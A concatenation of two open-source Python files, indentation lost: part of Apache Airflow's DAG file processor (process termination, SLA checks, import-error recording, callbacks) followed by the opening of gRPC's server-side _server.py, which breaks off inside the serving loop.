"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
# Reap the spawned zombie. We active wait, because in Python 3.9 `waitpid` might lead to an
# exception, due to change in Python standard library and possibility of race condition
# see https://bugs.python.org/issue42558
while self._process._popen.poll() is None: # type: ignore
time.sleep(0.001)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:param log: Logger to save the processing process
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(DR.execution_date).label('max_ti'))
.join(TI.dag_run)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
# get recorded SlaMiss
recorded_slas_query = set(
session.query(SlaMiss.dag_id, SlaMiss.task_id, SlaMiss.execution_date).filter(
SlaMiss.dag_id == dag.dag_id, SlaMiss.task_id.in_(dag.task_ids)
)
)
max_tis: Iterator[TI] = (
session.query(TI)
.join(TI.dag_run)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
DR.execution_date == qry.c.max_ti,
)
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not task.sla:
continue
if not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
sla_misses = []
next_info = dag.next_dagrun_info(dag.get_run_data_interval(ti.dag_run), restricted=False)
if next_info is None:
self.log.info("Skipping SLA check for %s because task does not have scheduled date", ti)
else:
while next_info.logical_date < ts:
next_info = dag.next_dagrun_info(next_info.data_interval, restricted=False)
if next_info is None:
break
if (ti.dag_id, ti.task_id, next_info.logical_date) in recorded_slas_query:
break
if next_info.logical_date + task.sla < ts:
sla_miss = SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=next_info.logical_date,
timestamp=ts,
)
sla_misses.append(sla_miss)
if sla_misses:
session.add_all(sla_misses)
session.commit()
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
if slas:
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception:
Stats.incr('sla_callback_notification_failure')
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception:
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:param dagbag: DagBag containing DAGs with import errors
"""
files_without_error = dagbag.file_last_changed - dagbag.import_errors.keys()
# Clear the errors of the processed files
# that no longer have errors
for dagbag_file in files_without_error:
session.query(errors.ImportError).filter(
errors.ImportError.filename.startswith(dagbag_file)
).delete(synchronize_session="fetch")
# files that still have errors
existing_import_error_files = [x.filename for x in session.query(errors.ImportError.filename).all()]
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
if filename in existing_import_error_files:
session.query(errors.ImportError).filter(errors.ImportError.filename == filename).update(
dict(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace),
synchronize_session='fetch',
)
else:
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
(
session.query(DagModel)
.filter(DagModel.fileloc == filename)
.update({'has_import_errors': True}, synchronize_session='fetch')
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = NEW_SESSION
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.get_dag(request.dag_id), session=session)
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception:
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(run_id=request.run_id, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
if request.is_failure_callback:
ti = TI(task, run_id=simple_ti.run_id)
# TODO: Use simple_ti to improve performance here in the future
ti.refresh_from_db()
ti.handle_failure_with_callback(error=request.msg, test_mode=self.UNIT_TEST_MODE)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Mark any DAGs which are no longer present as inactive
6. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:param callback_requests: failure callback to execute
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:param session: Sqlalchemy ORM Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
|
_server.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_LOGGER = logging.getLogger(__name__)
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_DEALLOCATED_SERVER_CHECK_PERIOD_S = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].message()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',
)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
self.abortion = None
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(operations,
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].cancelled():
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(self._rpc_event.call_details.deadline - time.time(), 0)
def cancel(self):
self._rpc_event.call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return self._rpc_event.invocation_metadata
def peer(self):
return _common.decode(self._rpc_event.call.peer())
def peer_identities(self):
return cygrpc.peer_identities(self._rpc_event.call)
def peer_identity_key(self):
id_key = cygrpc.peer_identity_key(self._rpc_event.call)
return id_key if id_key is None else _common.decode(id_key)
def auth_context(self):
return {
_common.decode(key): value
for key, value in six.iteritems(
cygrpc.auth_context(self._rpc_event.call))
}
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.SendInitialMetadataOperation(
initial_metadata, _EMPTY_FLAGS)
self._rpc_event.call.start_server_batch(
(operation,), _send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = trailing_metadata
def abort(self, code, details):
# treat OK like other invalid arguments: fail the RPC
if code == grpc.StatusCode.OK:
_LOGGER.error(
'abort() called with StatusCode.OK; returning UNKNOWN')
code = grpc.StatusCode.UNKNOWN
details = ''
with self._state.condition:
self._state.code = code
self._state.details = _common.encode(details)
self._state.abortion = Exception()
raise self._state.abortion
def abort_with_status(self, status):
self._state.trailing_metadata = status.trailing_metadata
self.abort(status.code, status.details)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
raise AssertionError() # should never run
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(state, rpc_event.call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.call_details.method)
_abort(state, rpc_event.call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception calling application: {}'.format(exception)
_LOGGER.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(exception)
_LOGGER.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.SendMessageOperation(
serialized_response, _EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.call.start_server_batch(operations,
_send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS))
rpc_event.call.start_server_batch(
operations,
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
cygrpc.install_census_context_from_call(rpc_event.call)
try:
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
finally:
cygrpc.uninstall_context()
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
cygrpc.install_census_context_from_call(rpc_event.call)
try:
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(
rpc_event, state, serialized_response)
if not proceed:
break
else:
break
else:
break
finally:
cygrpc.uninstall_context()
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer, method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
def query_handlers(handler_call_details):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(handler_call_details)
if method_handler is not None:
return method_handler
return None
handler_call_details = _HandlerCallDetails(
_common.decode(rpc_event.call_details.method),
rpc_event.invocation_metadata)
if interceptor_pipeline is not None:
return interceptor_pipeline.execute(query_handlers,
handler_call_details)
else:
return query_handlers(handler_call_details)
def _reject_rpc(rpc_event, status, details):
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(None, status, details,
_EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.call.start_server_batch(operations,
lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
return state, _handle_stream_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_stream_unary(rpc_event, state,
method_handler, thread_pool)
else:
if method_handler.response_streaming:
return state, _handle_unary_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_unary_unary(rpc_event, state,
method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
concurrency_exceeded):
if not rpc_event.success:
return None, None
if rpc_event.call_details.method is not None:
try:
method_handler = _find_method_handler(rpc_event, generic_handlers,
interceptor_pipeline)
except Exception as exception: # pylint: disable=broad-except
details = 'Exception servicing handler: {}'.format(exception)
_LOGGER.exception(details)
return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
b'Error in service handler!'), None
if method_handler is None:
return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
b'Method not found!'), None
elif concurrency_exceeded:
return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
b'Concurrent RPC limit exceeded!'), None
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None, None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
# pylint: disable=too-many-arguments
def __init__(self, completion_queue, server, generic_handlers,
interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
self.lock = threading.RLock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.interceptor_pipeline = interceptor_pipeline
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
self.active_rpc_count = 0
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
# A "volatile" flag to interrupt the daemon serving thread
self.server_deallocated = False
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
state.server.destroy()
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _on_call_completed(state):
with state.lock:
state.active_rpc_count -= 1
def _process_event_and_continue(state, event):
should_continue = True
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
should_continue = False
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
concurrency_exceeded = (
state.maximum_concurrent_rpcs is not None and
state.active_rpc_count >= state.maximum_concurrent_rpcs)
rpc_state, rpc_future = _handle_call(
event, state.generic_handlers, state.interceptor_pipeline,
state.thread_pool, concurrency_exceeded)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if rpc_future is not None:
state.active_rpc_count += 1
rpc_future.add_done_callback(
lambda unused_future: _on_call_completed(state))
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
should_continue = False
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
